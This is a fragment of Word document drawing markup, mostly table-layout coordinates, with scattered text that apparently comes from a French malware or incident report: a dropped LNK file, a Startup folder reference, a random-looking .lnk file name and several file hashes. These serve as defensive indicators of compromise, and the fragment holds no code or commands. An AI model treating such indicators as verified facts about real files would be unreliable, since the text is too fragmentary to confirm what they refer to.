            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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51155">
                          <a:moveTo>
                            <a:pt x="3670299" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="35115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51155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="35115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596264" y="35115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444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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="8169275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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8169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8169275">
                          <a:moveTo>
                            <a:pt x="3670299" y="8169275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="8169275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="8169275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="8169275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="8169275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="8169275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="8169275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="8169275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7462520"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8169275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="7461885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7461885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7461885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="7461885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7461885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7461885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7461885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7461885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6899910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7461885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6899275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6899275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6899275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6899275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6899275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6899275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6899275"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6899275"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6156960"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6899275"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6156325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6156325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6156325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6156325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6156325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6156325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6156325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6156325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5269230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6156325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5268595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5268595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5268595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5268595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5268595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5268595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5268595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5268595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4702810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5268595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4702175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4702175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4702175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4702175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4702175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4702175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4702175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4702175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4171950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4702175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4171315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4171315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4171315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4171315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4171315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4171315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4171315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4171315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3464560"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4171315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3463925"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3463925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3463925"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3463925"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3463925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3463925"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3463925"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3463925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2901950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3463925"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2901315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2901315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2901315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2901315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2901315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2901315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2901315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2901315"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2335530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2901315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2334895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2334895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2334895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2334895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2334895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2334895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2334895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2334895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1804670"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2334895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1804035"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1804035"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1804035"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1804035"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1804035"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1804035"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1804035"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1804035"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1273810"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1804035"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1273175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1273175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1273175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1273175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1273175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1273175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1273175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1273175"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="742950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1273175"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="742315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="74231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742315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="742315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="74231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742315"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="742315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="74231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74231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08000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34050" cy="8528050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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050" cy="8528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050" h="8528050">
                          <a:moveTo>
                            <a:pt x="600075" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="600075" y="8521699"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="8528050"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="8524875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5734050" y="8524875"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="7817485"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="7817485"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="7254875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="7254875"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="6511925"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6511925"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5624194"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5624194"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5057774"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5057774"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4526915"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4526915"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3819524"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3819524"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3256914"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3256914"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2690495"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2690495"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2159635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2159635"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1628774"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1628774"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1097914"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1097914"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="354964"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="354964"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="57340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09024" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4570729</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="8515349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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515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515349">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="851534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10048" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6628130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="8528050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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528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528050">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="852805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14144" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605655</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1559569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="608333" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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33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32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608329" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60832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22336" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3895099</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="608968" cy="589280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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968" cy="5892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964" h="589280">
                          <a:moveTo>
                            <a:pt x="635" y="589280"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="389890"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363854" y="389890"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="589280"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="390525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="390525"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964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26432" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5177155</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6263649</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361953" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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95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1949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361949" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36194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4624" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7716529</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="608968" cy="765809"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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968" cy="765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964" h="765809">
                          <a:moveTo>
                            <a:pt x="635" y="765809"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="566419"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363854" y="566419"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="765809"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="567054"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="56705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608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964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564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6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667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6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7696" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2922270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260661" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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66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8720" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1036954</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361941" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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9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Type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9744" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5215890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803629" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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076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1353208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062363" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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3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Fichier LNK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déposé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179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1453145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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24520d4654a04a4605a9ce84341bf35ec2072a1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2816" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6555613</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1546883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113675" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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3840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1545178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="607783" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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7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Startup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48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1548788</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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588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1629675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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e7f669bc0212f22783ff49565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691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1735720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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37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dXd9PBI7I7RL9.lnk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793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2090050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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1f5c3f4877f79b03a978d853b7a74dc5522413d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896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2185693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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99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2185693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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100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2266580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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ef61bac9960ca648765992488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203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2620910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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5bde73f076171dddfadd3c9587043bb1d8e3bed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3056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2716553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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408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2797440</wp:posOffset>
            </wp:positionV>
